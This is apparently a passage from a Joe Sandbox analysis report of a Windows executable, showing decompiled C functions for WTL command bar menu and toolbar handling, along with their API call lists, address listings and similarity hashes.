                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_t146);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t161 =  *0x1719a4; // 0x0
                                                                                                                                                                                                                                                                                          					_t175 =  *(_t181 + 4);
                                                                                                                                                                                                                                                                                          					_t144 = PostMessageA;
                                                                                                                                                                                                                                                                                          					_t132 = PostMessageA( *(_t181 + 4), _t161,  *(_t181 + 0x8c) & 0x0000ffff, 0);
                                                                                                                                                                                                                                                                                          					if(( *(_t181 + 0x8c) & 0xffff0000) == 0 && ( *(_t181 + 0x84) & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                          						_t132 = PostMessageA( *(_t181 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_t181 + 0x8c) = _t180;
                                                                                                                                                                                                                                                                                          					return E001059E6(_t132, _t144, _v12 ^ _t182, _t175, _t180, _t181);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}







































                                                                                                                                                                                                                                                                                          0x00100c90
                                                                                                                                                                                                                                                                                          0x00100c96
                                                                                                                                                                                                                                                                                          0x00100c9d
                                                                                                                                                                                                                                                                                          0x00100ca1
                                                                                                                                                                                                                                                                                          0x00100caa
                                                                                                                                                                                                                                                                                          0x00100cad
                                                                                                                                                                                                                                                                                          0x00100cb0
                                                                                                                                                                                                                                                                                          0x00100cb3
                                                                                                                                                                                                                                                                                          0x00100cba
                                                                                                                                                                                                                                                                                          0x00100cc6
                                                                                                                                                                                                                                                                                          0x00100cd4
                                                                                                                                                                                                                                                                                          0x00100cdd
                                                                                                                                                                                                                                                                                          0x00100ce0
                                                                                                                                                                                                                                                                                          0x00100cf2
                                                                                                                                                                                                                                                                                          0x00100d00
                                                                                                                                                                                                                                                                                          0x00100d03
                                                                                                                                                                                                                                                                                          0x00100d06
                                                                                                                                                                                                                                                                                          0x00100d09
                                                                                                                                                                                                                                                                                          0x00100d0f
                                                                                                                                                                                                                                                                                          0x00100d15
                                                                                                                                                                                                                                                                                          0x00100d1d
                                                                                                                                                                                                                                                                                          0x00100d24
                                                                                                                                                                                                                                                                                          0x00100d27
                                                                                                                                                                                                                                                                                          0x00100d38
                                                                                                                                                                                                                                                                                          0x00100d43
                                                                                                                                                                                                                                                                                          0x00100d46
                                                                                                                                                                                                                                                                                          0x00100d49
                                                                                                                                                                                                                                                                                          0x00100d4c
                                                                                                                                                                                                                                                                                          0x00100d4f
                                                                                                                                                                                                                                                                                          0x00100d52
                                                                                                                                                                                                                                                                                          0x00100d54
                                                                                                                                                                                                                                                                                          0x00100d5a
                                                                                                                                                                                                                                                                                          0x00100d66
                                                                                                                                                                                                                                                                                          0x00100d6c
                                                                                                                                                                                                                                                                                          0x00100d6e
                                                                                                                                                                                                                                                                                          0x00100d7d
                                                                                                                                                                                                                                                                                          0x00100d86
                                                                                                                                                                                                                                                                                          0x00100d9c
                                                                                                                                                                                                                                                                                          0x00100d88
                                                                                                                                                                                                                                                                                          0x00100d8e
                                                                                                                                                                                                                                                                                          0x00100d95
                                                                                                                                                                                                                                                                                          0x00100d95
                                                                                                                                                                                                                                                                                          0x00100db1
                                                                                                                                                                                                                                                                                          0x00100dc2
                                                                                                                                                                                                                                                                                          0x00100dc4
                                                                                                                                                                                                                                                                                          0x00100dcf
                                                                                                                                                                                                                                                                                          0x00100ddb
                                                                                                                                                                                                                                                                                          0x00100ddb
                                                                                                                                                                                                                                                                                          0x00100ddd
                                                                                                                                                                                                                                                                                          0x00100de0
                                                                                                                                                                                                                                                                                          0x00100df3
                                                                                                                                                                                                                                                                                          0x00100df6
                                                                                                                                                                                                                                                                                          0x00100df9
                                                                                                                                                                                                                                                                                          0x00100dfc
                                                                                                                                                                                                                                                                                          0x00100dff
                                                                                                                                                                                                                                                                                          0x00100e02
                                                                                                                                                                                                                                                                                          0x00100e05
                                                                                                                                                                                                                                                                                          0x00100e0d
                                                                                                                                                                                                                                                                                          0x00100e1b
                                                                                                                                                                                                                                                                                          0x00100e20
                                                                                                                                                                                                                                                                                          0x00100e23
                                                                                                                                                                                                                                                                                          0x00100e31
                                                                                                                                                                                                                                                                                          0x00100e43
                                                                                                                                                                                                                                                                                          0x00100e47
                                                                                                                                                                                                                                                                                          0x00100e47
                                                                                                                                                                                                                                                                                          0x00100e31
                                                                                                                                                                                                                                                                                          0x00100e49
                                                                                                                                                                                                                                                                                          0x00100e52
                                                                                                                                                                                                                                                                                          0x00100eea
                                                                                                                                                                                                                                                                                          0x00100ef8
                                                                                                                                                                                                                                                                                          0x00100f38
                                                                                                                                                                                                                                                                                          0x00100f58
                                                                                                                                                                                                                                                                                          0x00100efa
                                                                                                                                                                                                                                                                                          0x00100efa
                                                                                                                                                                                                                                                                                          0x00100f02
                                                                                                                                                                                                                                                                                          0x00100f0a
                                                                                                                                                                                                                                                                                          0x00100f0a
                                                                                                                                                                                                                                                                                          0x00100f26
                                                                                                                                                                                                                                                                                          0x00100f26
                                                                                                                                                                                                                                                                                          0x00100e58
                                                                                                                                                                                                                                                                                          0x00100e5f
                                                                                                                                                                                                                                                                                          0x00100e61
                                                                                                                                                                                                                                                                                          0x00100e67
                                                                                                                                                                                                                                                                                          0x00100e6b
                                                                                                                                                                                                                                                                                          0x00100e78
                                                                                                                                                                                                                                                                                          0x00100e85
                                                                                                                                                                                                                                                                                          0x00100e85
                                                                                                                                                                                                                                                                                          0x00100e8b
                                                                                                                                                                                                                                                                                          0x00100e8b
                                                                                                                                                                                                                                                                                          0x00100e98
                                                                                                                                                                                                                                                                                          0x00100e9e
                                                                                                                                                                                                                                                                                          0x00100ea1
                                                                                                                                                                                                                                                                                          0x00100eac
                                                                                                                                                                                                                                                                                          0x00100eb8
                                                                                                                                                                                                                                                                                          0x00100ed0
                                                                                                                                                                                                                                                                                          0x00100ed0
                                                                                                                                                                                                                                                                                          0x00100ed2
                                                                                                                                                                                                                                                                                          0x00100ee7
                                                                                                                                                                                                                                                                                          0x00100ee7

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041D,?,?), ref: 00100CC6
                                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00100CE0
                                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00100CF2
                                                                                                                                                                                                                                                                                          • GetSubMenu.USER32 ref: 00100D2A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000417,?,?), ref: 00100D52
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000403,?,00000001), ref: 00100D6C
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000448,?,00000000), ref: 00100D7D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000403,?,00000000), ref: 00100DC2
                                                                                                                                                                                                                                                                                          • GetFocus.USER32(?,?,00000000,?,?,?), ref: 00100DC7
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 00100DDB
                                                                                                                                                                                                                                                                                          • PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 00100E17
                                                                                                                                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00100E29
                                                                                                                                                                                                                                                                                          • PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 00100E47
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(001719AC,?,?), ref: 00100E6B
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalAutoPopupMsg,?,?), ref: 00100E7F
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(001719AC,?,?), ref: 00100E8B
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 00100EAC
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 00100ED0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • WTL_CmdBar_InternalAutoPopupMsg, xrefs: 00100E7A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$Send$Window$CriticalPeekPointsPostSection$EnterFocusLeaveMenuRectRegister
                                                                                                                                                                                                                                                                                          • String ID: WTL_CmdBar_InternalAutoPopupMsg
                                                                                                                                                                                                                                                                                          • API String ID: 3627267019-631010736
                                                                                                                                                                                                                                                                                          • Opcode ID: 3065f9b13e1fabe355c345d23f3a8c3fe10f754f18c06cb28dbe788e61af487f
                                                                                                                                                                                                                                                                                          • Instruction ID: aa7b2b35f18727cdcbaecdae3770b0295e494d9f69364fea273f996107989826
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3065f9b13e1fabe355c345d23f3a8c3fe10f754f18c06cb28dbe788e61af487f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48911DB1E00708AFDB14CFA9DD85FAEB7F5BB48700F108519E659E7280D7B0A981CB24
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E000FBB40(struct HMENU__* __ecx, struct HWND__* __edx, void* __edi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v116;
                                                                                                                                                                                                                                                                                          				int _v120;
                                                                                                                                                                                                                                                                                          				int _v124;
                                                                                                                                                                                                                                                                                          				char _v127;
                                                                                                                                                                                                                                                                                          				char _v128;
                                                                                                                                                                                                                                                                                          				int _v132;
                                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v292;
                                                                                                                                                                                                                                                                                          				int _v296;
                                                                                                                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                                                                                                                          				CHAR* _v304;
                                                                                                                                                                                                                                                                                          				intOrPtr _v308;
                                                                                                                                                                                                                                                                                          				intOrPtr _v312;
                                                                                                                                                                                                                                                                                          				intOrPtr _v316;
                                                                                                                                                                                                                                                                                          				intOrPtr _v320;
                                                                                                                                                                                                                                                                                          				intOrPtr _v324;
                                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v376;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t69;
                                                                                                                                                                                                                                                                                          				long _t74;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t75;
                                                                                                                                                                                                                                                                                          				int _t80;
                                                                                                                                                                                                                                                                                          				intOrPtr _t96;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				int _t126;
                                                                                                                                                                                                                                                                                          				long _t127;
                                                                                                                                                                                                                                                                                          				signed int _t128;
                                                                                                                                                                                                                                                                                          				void* _t129;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t125 = __edi;
                                                                                                                                                                                                                                                                                          				_t118 = __edx;
                                                                                                                                                                                                                                                                                          				_t67 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t67 ^ _t128;
                                                                                                                                                                                                                                                                                          				_t126 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__ecx == 0 || IsMenu(__ecx) != 0) {
                                                                                                                                                                                                                                                                                          					_t69 =  *(_t125 + 0x44);
                                                                                                                                                                                                                                                                                          					if(_t69 != 0 && ( *(_t125 + 0x58) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          						DestroyMenu(_t69);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_t125 + 0x44) = _t126;
                                                                                                                                                                                                                                                                                          					if(( *(_t125 + 0x84) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          						_t101 = SendMessageA;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t125 + 4), 0xb, 0, 0);
                                                                                                                                                                                                                                                                                          						_t74 = SendMessageA( *(_t125 + 4), 0x418, 0, 0);
                                                                                                                                                                                                                                                                                          						if(_t74 > 0) {
                                                                                                                                                                                                                                                                                          							_t127 = _t74;
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t125 + 4), 0x416, 0, 0);
                                                                                                                                                                                                                                                                                          								_t127 = _t127 - 1;
                                                                                                                                                                                                                                                                                          							} while (_t127 != 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t75 =  *(_t125 + 0x44);
                                                                                                                                                                                                                                                                                          						if(_t75 != 0) {
                                                                                                                                                                                                                                                                                          							_t80 = GetMenuItemCount(_t75);
                                                                                                                                                                                                                                                                                          							_t126 = 0;
                                                                                                                                                                                                                                                                                          							_v296 = _t80;
                                                                                                                                                                                                                                                                                          							if(_t80 > 0) {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									E00106820( &_v376, 0, 0x30);
                                                                                                                                                                                                                                                                                          									_v376.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          									E00106820( &(_v292.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          									_t129 = _t129 + 0x18;
                                                                                                                                                                                                                                                                                          									_v292.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          									if(GetVersionExA( &_v292) == 0) {
                                                                                                                                                                                                                                                                                          										L16:
                                                                                                                                                                                                                                                                                          										_v376.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t96 = _v292.dwMajorVersion;
                                                                                                                                                                                                                                                                                          										if(_t96 < 5 && (_t96 != 4 || _v292.dwMinorVersion < 0x5a)) {
                                                                                                                                                                                                                                                                                          											goto L16;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v376.fMask = 0x15;
                                                                                                                                                                                                                                                                                          									_v376.fType = 0;
                                                                                                                                                                                                                                                                                          									_v376.dwTypeData =  &_v116;
                                                                                                                                                                                                                                                                                          									_v376.cch = 0x64;
                                                                                                                                                                                                                                                                                          									GetMenuItemInfoA( *(_t125 + 0x44), _t126, 1,  &_v376);
                                                                                                                                                                                                                                                                                          									if(lstrlenA( &_v116) > 0x63) {
                                                                                                                                                                                                                                                                                          										_v376.fType = 4;
                                                                                                                                                                                                                                                                                          										SetMenuItemInfoA( *(_t125 + 0x44), _t126, 1,  &_v376);
                                                                                                                                                                                                                                                                                          										_v116 = 0;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									asm("sbb cl, cl");
                                                                                                                                                                                                                                                                                          									_v128 = 0;
                                                                                                                                                                                                                                                                                          									_v124 = 0;
                                                                                                                                                                                                                                                                                          									_v120 = 0;
                                                                                                                                                                                                                                                                                          									_v132 = 0;
                                                                                                                                                                                                                                                                                          									_v136 = 0;
                                                                                                                                                                                                                                                                                          									_v124 = 0;
                                                                                                                                                                                                                                                                                          									_v120 = 0;
                                                                                                                                                                                                                                                                                          									_v132 = _t126;
                                                                                                                                                                                                                                                                                          									_v128 = 4 + ( ~(_v376.fState & 0x00000003) & 0x000000fc);
                                                                                                                                                                                                                                                                                          									_v127 = 0x18;
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t125 + 4), 0x415, 0xffffffff,  &_v136);
                                                                                                                                                                                                                                                                                          									_v324 = 0;
                                                                                                                                                                                                                                                                                          									_v304 = 0;
                                                                                                                                                                                                                                                                                          									_v320 = 0;
                                                                                                                                                                                                                                                                                          									_v316 = 0;
                                                                                                                                                                                                                                                                                          									_v312 = 0;
                                                                                                                                                                                                                                                                                          									_v308 = 0;
                                                                                                                                                                                                                                                                                          									_v300 = 0;
                                                                                                                                                                                                                                                                                          									_v328 = 0x20;
                                                                                                                                                                                                                                                                                          									_v324 = 2;
                                                                                                                                                                                                                                                                                          									_v304 =  &_v116;
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t125 + 4), 0x442, _t126,  &_v328);
                                                                                                                                                                                                                                                                                          									_t126 = _t126 + 1;
                                                                                                                                                                                                                                                                                          								} while (_t126 < _v296);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t125 + 4), 0xb, 1, 0);
                                                                                                                                                                                                                                                                                          						_t118 =  *(_t125 + 4);
                                                                                                                                                                                                                                                                                          						InvalidateRect( *(_t125 + 4), 0, 1);
                                                                                                                                                                                                                                                                                          						UpdateWindow( *(_t125 + 4));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t101, _v8 ^ _t128, _t118, _t125, _t126);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E001059E6(_t99, _t101, _v8 ^ _t128, _t118, __edi, _t126);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



































                                                                                                                                                                                                                                                                                          0x000fbb40
                                                                                                                                                                                                                                                                                          0x000fbb40
                                                                                                                                                                                                                                                                                          0x000fbb49
                                                                                                                                                                                                                                                                                          0x000fbb50
                                                                                                                                                                                                                                                                                          0x000fbb55
                                                                                                                                                                                                                                                                                          0x000fbb59
                                                                                                                                                                                                                                                                                          0x000fbb76
                                                                                                                                                                                                                                                                                          0x000fbb7b
                                                                                                                                                                                                                                                                                          0x000fbb84
                                                                                                                                                                                                                                                                                          0x000fbb84
                                                                                                                                                                                                                                                                                          0x000fbb91
                                                                                                                                                                                                                                                                                          0x000fbb94
                                                                                                                                                                                                                                                                                          0x000fbb9d
                                                                                                                                                                                                                                                                                          0x000fbbaa
                                                                                                                                                                                                                                                                                          0x000fbbb9
                                                                                                                                                                                                                                                                                          0x000fbbbd
                                                                                                                                                                                                                                                                                          0x000fbbbf
                                                                                                                                                                                                                                                                                          0x000fbbc1
                                                                                                                                                                                                                                                                                          0x000fbbce
                                                                                                                                                                                                                                                                                          0x000fbbd0
                                                                                                                                                                                                                                                                                          0x000fbbd0
                                                                                                                                                                                                                                                                                          0x000fbbc1
                                                                                                                                                                                                                                                                                          0x000fbbd3
                                                                                                                                                                                                                                                                                          0x000fbbd8
                                                                                                                                                                                                                                                                                          0x000fbbdf
                                                                                                                                                                                                                                                                                          0x000fbbe5
                                                                                                                                                                                                                                                                                          0x000fbbe7
                                                                                                                                                                                                                                                                                          0x000fbbef
                                                                                                                                                                                                                                                                                          0x000fbbf5
                                                                                                                                                                                                                                                                                          0x000fbc00
                                                                                                                                                                                                                                                                                          0x000fbc13
                                                                                                                                                                                                                                                                                          0x000fbc1d
                                                                                                                                                                                                                                                                                          0x000fbc22
                                                                                                                                                                                                                                                                                          0x000fbc2c
                                                                                                                                                                                                                                                                                          0x000fbc3e
                                                                                                                                                                                                                                                                                          0x000fbc59
                                                                                                                                                                                                                                                                                          0x000fbc59
                                                                                                                                                                                                                                                                                          0x000fbc40
                                                                                                                                                                                                                                                                                          0x000fbc40
                                                                                                                                                                                                                                                                                          0x000fbc49
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fbc49
                                                                                                                                                                                                                                                                                          0x000fbc74
                                                                                                                                                                                                                                                                                          0x000fbc7e
                                                                                                                                                                                                                                                                                          0x000fbc88
                                                                                                                                                                                                                                                                                          0x000fbc8e
                                                                                                                                                                                                                                                                                          0x000fbc98
                                                                                                                                                                                                                                                                                          0x000fbcab
                                                                                                                                                                                                                                                                                          0x000fbcbb
                                                                                                                                                                                                                                                                                          0x000fbcc5
                                                                                                                                                                                                                                                                                          0x000fbccb
                                                                                                                                                                                                                                                                                          0x000fbccb
                                                                                                                                                                                                                                                                                          0x000fbce3
                                                                                                                                                                                                                                                                                          0x000fbce5
                                                                                                                                                                                                                                                                                          0x000fbce8
                                                                                                                                                                                                                                                                                          0x000fbceb
                                                                                                                                                                                                                                                                                          0x000fbcf0
                                                                                                                                                                                                                                                                                          0x000fbcf3
                                                                                                                                                                                                                                                                                          0x000fbcfc
                                                                                                                                                                                                                                                                                          0x000fbcff
                                                                                                                                                                                                                                                                                          0x000fbd0e
                                                                                                                                                                                                                                                                                          0x000fbd11
                                                                                                                                                                                                                                                                                          0x000fbd14
                                                                                                                                                                                                                                                                                          0x000fbd18
                                                                                                                                                                                                                                                                                          0x000fbd24
                                                                                                                                                                                                                                                                                          0x000fbd2a
                                                                                                                                                                                                                                                                                          0x000fbd30
                                                                                                                                                                                                                                                                                          0x000fbd36
                                                                                                                                                                                                                                                                                          0x000fbd3c
                                                                                                                                                                                                                                                                                          0x000fbd42
                                                                                                                                                                                                                                                                                          0x000fbd48
                                                                                                                                                                                                                                                                                          0x000fbd5a
                                                                                                                                                                                                                                                                                          0x000fbd64
                                                                                                                                                                                                                                                                                          0x000fbd6e
                                                                                                                                                                                                                                                                                          0x000fbd74
                                                                                                                                                                                                                                                                                          0x000fbd76
                                                                                                                                                                                                                                                                                          0x000fbd77
                                                                                                                                                                                                                                                                                          0x000fbbf5
                                                                                                                                                                                                                                                                                          0x000fbbef
                                                                                                                                                                                                                                                                                          0x000fbd8d
                                                                                                                                                                                                                                                                                          0x000fbd8f
                                                                                                                                                                                                                                                                                          0x000fbd97
                                                                                                                                                                                                                                                                                          0x000fbda1
                                                                                                                                                                                                                                                                                          0x000fbda1
                                                                                                                                                                                                                                                                                          0x000fbdbb
                                                                                                                                                                                                                                                                                          0x000fbb68
                                                                                                                                                                                                                                                                                          0x000fbb75
                                                                                                                                                                                                                                                                                          0x000fbb75

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsMenu.USER32 ref: 000FBB5C
                                                                                                                                                                                                                                                                                          • DestroyMenu.USER32(?,?,00000000), ref: 000FBB84
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 000FBBAA
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 000FBBB9
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000416,00000000,00000000), ref: 000FBBCE
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 000FBBDF
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FBC00
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FBC1D
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000), ref: 000FBC36
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 000FBC98
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000), ref: 000FBCA2
                                                                                                                                                                                                                                                                                          • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 000FBCC5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000415,000000FF,?), ref: 000FBD18
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000442,00000000,?), ref: 000FBD74
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 000FBD8D
                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000000), ref: 000FBD97
                                                                                                                                                                                                                                                                                          • UpdateWindow.USER32(?), ref: 000FBDA1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Menu$Item$Info_memset$CountDestroyInvalidateRectUpdateVersionWindowlstrlen
                                                                                                                                                                                                                                                                                          • String ID: $,$Z$d
                                                                                                                                                                                                                                                                                          • API String ID: 1339012150-1066513455
                                                                                                                                                                                                                                                                                          • Opcode ID: 259862d8762748a25c871f6c076e9b42c09829800bf9c08f1b186110e2d1e2aa
                                                                                                                                                                                                                                                                                          • Instruction ID: 84ae4b05674536f02dff54927b77c5cbc651ba427e5eab37706a236c60184fb6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 259862d8762748a25c871f6c076e9b42c09829800bf9c08f1b186110e2d1e2aa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 997121B1D00619AFDB71CF64CD85BDAB7F4BB08714F104199E608E7681D7B5A980CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                          			E000F5910(CHAR** _a4, CHAR* _a8, char _a12) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long* _v16;
                                                                                                                                                                                                                                                                                          				char* _v20;
                                                                                                                                                                                                                                                                                          				CHAR* _t88;
                                                                                                                                                                                                                                                                                          				CHAR* _t93;
                                                                                                                                                                                                                                                                                          				CHAR* _t95;
                                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                                          				long* _t100;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				long* _t104;
                                                                                                                                                                                                                                                                                          				CHAR* _t105;
                                                                                                                                                                                                                                                                                          				CHAR* _t111;
                                                                                                                                                                                                                                                                                          				char _t115;
                                                                                                                                                                                                                                                                                          				char _t118;
                                                                                                                                                                                                                                                                                          				void* _t120;
                                                                                                                                                                                                                                                                                          				signed int _t122;
                                                                                                                                                                                                                                                                                          				long* _t123;
                                                                                                                                                                                                                                                                                          				long* _t124;
                                                                                                                                                                                                                                                                                          				long* _t125;
                                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                                          				char _t131;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t132;
                                                                                                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                                                                                                          				long* _t134;
                                                                                                                                                                                                                                                                                          				char _t136;
                                                                                                                                                                                                                                                                                          				long* _t137;
                                                                                                                                                                                                                                                                                          				char _t139;
                                                                                                                                                                                                                                                                                          				CHAR* _t140;
                                                                                                                                                                                                                                                                                          				long* _t141;
                                                                                                                                                                                                                                                                                          				long* _t146;
                                                                                                                                                                                                                                                                                          				long* _t147;
                                                                                                                                                                                                                                                                                          				char _t150;
                                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t156;
                                                                                                                                                                                                                                                                                          				intOrPtr _t158;
                                                                                                                                                                                                                                                                                          				signed int _t160;
                                                                                                                                                                                                                                                                                          				CHAR* _t168;
                                                                                                                                                                                                                                                                                          				long* _t170;
                                                                                                                                                                                                                                                                                          				long* _t171;
                                                                                                                                                                                                                                                                                          				long* _t181;
                                                                                                                                                                                                                                                                                          				long* _t183;
